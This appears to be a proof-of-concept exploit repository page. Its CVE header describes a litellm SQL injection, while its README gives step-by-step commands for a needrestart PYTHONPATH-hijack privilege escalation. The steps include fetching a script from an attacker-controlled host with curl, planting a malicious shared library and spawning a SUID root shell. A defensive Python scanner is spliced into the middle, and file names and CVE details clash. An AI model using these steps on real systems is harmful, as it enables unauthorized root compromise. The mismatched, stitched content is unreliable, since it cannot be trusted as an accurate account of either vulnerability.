Associated Vulnerability
Title: Blind SQL Injection in berriai/litellm (CVE-2024-4890)
Description: A blind SQL injection vulnerability exists in the berriai/litellm application, specifically within the '/team/update' process. The vulnerability arises due to the improper handling of the 'user_id' parameter in the raw SQL query used for deleting users. An attacker can exploit this vulnerability by injecting malicious SQL commands through the 'user_id' parameter, leading to potential unauthorized access to sensitive information such as API keys, user information, and tokens stored in the database. The affected version is 1.27.14.
Description
PoC exploit for CVE-2024-4890: sudo privilege escalation via needrestart (>= 3.8). Ethical, lab-only. Scripts in Python and C.
Readme
# CVE-2024-4890: needrestart Sudo Privilege Escalation PoC
[CVE-2024-4890 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-4890)
[MIT License](https://opensource.org/licenses/MIT)
## Disclaimer
**For lab-only use in controlled environments. Do not exploit on production systems without explicit authorization. This PoC is for educational purposes only. The author is not responsible for any misuse or unauthorized access.**
## Overview
CVE-2024-4890 is a critical vulnerability in `needrestart` (versions >= 3.8) that enables arbitrary code execution with elevated privileges. The issue stems from insecure handling of environment variables and configuration files during process scanning.
Specifically, when run with `sudo`, `needrestart` inspects running Python processes, including their `PYTHONPATH` environment variable. An attacker can hijack this by setting a custom `PYTHONPATH` pointing to a controlled directory (e.g., `/tmp/attacker`). Inside this directory, a malicious module (`__init__.so`) is placed in a fake `importlib` structure. When `needrestart` attempts to import it as root (to check libraries), the payload executes, granting root access.
This PoC demonstrates the exploit via a bait Python process, a malicious shared library (compiled from C), and an automation script.
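The precondition the overview describes is a process whose `PYTHONPATH` points at a directory an unprivileged user controls. As an added defender-side example (not part of this PoC or of `needrestart`), the Python below parses `/proc/<pid>/environ` data and flags such entries; `UNTRUSTED_PREFIXES`, the ownership heuristic and the sample environ block are constructed assumptions.

```python
"""Defender-side check for the PYTHONPATH hijack described in the overview.
Added example, not part of the PoC: parses /proc/<pid>/environ data and flags
PYTHONPATH entries a local user controls, i.e. paths root must never import from."""
import os
import stat

UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed untrusted

def parse_environ(blob: bytes) -> dict:
    """Turn a NUL-separated KEY=VALUE blob into a {KEY: VALUE} dict."""
    env = {}
    for item in blob.split(b"\0"):
        if b"=" in item:
            key, _, value = item.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env

def suspicious_pythonpath_entries(env: dict) -> list:
    """Return PYTHONPATH entries an unprivileged user can control. The stat()
    check only runs for directories that exist, so captured data works too."""
    raw = env.get("PYTHONPATH")
    if raw is None:
        return []
    flagged = []
    for entry in raw.split(":"):  # Linux separator; /proc is Linux-only
        if entry == "" or not entry.startswith("/"):
            flagged.append(entry or "<empty: cwd>")  # resolved against cwd
        elif (os.path.normpath(entry) + "/").startswith(UNTRUSTED_PREFIXES):
            flagged.append(entry)
        elif os.path.isdir(entry):
            st = os.stat(entry)
            if st.st_uid != 0 or st.st_mode & stat.S_IWOTH:
                flagged.append(entry)  # non-root-owned or world-writable
    return flagged

def scan_proc(proc_root: str = "/proc") -> dict:
    """Map pid -> flagged entries for every readable process environment."""
    findings = {}
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        try:
            with open(os.path.join(proc_root, pid, "environ"), "rb") as fh:
                flagged = suspicious_pythonpath_entries(parse_environ(fh.read()))
        except OSError:  # other users' environ is unreadable without root
            continue
        if flagged:
            findings[pid] = flagged
    return findings

# Constructed sample mimicking a bait process; the empty entry means "cwd".
SAMPLE_ENVIRON = b"PATH=/usr/bin\0PYTHONPATH=/tmp/attacker::/opt/app/lib\0HOME=/home/u\0"
```

Run `scan_proc()` as root to cover every process; as an ordinary user it only sees your own.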
## Prerequisites
- **Target**: Linux system with `needrestart` >= 3.8 and `sudo` rights to run it.
- **Tools**: `gcc` (for compilation), `curl`, `python3`.
## Files Structure
Place these in `/tmp/attacker` on the **target machine**.
- `e.py`: Bait Python script (runs in loop, waits for payload success).
- `runner.sh`: Automation script to set up and trigger the bait.
## Exploit Steps
1. **Attacker Machine**: Compile `lib.c` to `__init__.so` and host it:
```bash
gcc -shared -fPIC -o init.so lib.c
python3 -m http.server 8000
```
2. **Target Machine** (Victim):
- Create the `/tmp/attacker` directory.
- Copy `main.py` into it.
- Download `runner.sh` and make it executable:
```bash
curl http://<ATTACKER_IP>:<PORT>/runner.sh -o /tmp/attacker/runner.sh
chmod +x /tmp/attacker/runner.sh
```
Run the setup in one terminal:
`cd /tmp/attacker && ./runner.sh`
This creates the malicious module, bait script, and starts the hijacked Python process.
3. **Trigger the Scan** (in a new SSH session):
`sudo /usr/sbin/needrestart`
`needrestart` detects the bait process, reads `PYTHONPATH`, and imports the malicious `__init__.so` as root—executing the payload.
4. **Harvest Access** (back in the `runner.sh` terminal):
- The script detects `/tmp/poc` (SUID root shell created by payload) and spawns a root shell:
`sudo /tmp/poc -p`
Clean up: `rm -rf /tmp/attacker /tmp/poc` (and remove sudoers entry if added).
**Success Indicator**: `whoami` shows `root` or `id` shows `uid=0(root)`.
File Snapshot
```text
[4.0K] /data/pocs/c0f46e1dc129b5b4d33965b7922094a53163d495
├── [1.0K] LICENSE
├── [2.8K] README.md
└── [4.0K] scripts
    ├── [ 769] lib.c
    ├── [  19] main.py
    └── [1.1K] runner.sh

2 directories, 5 files
```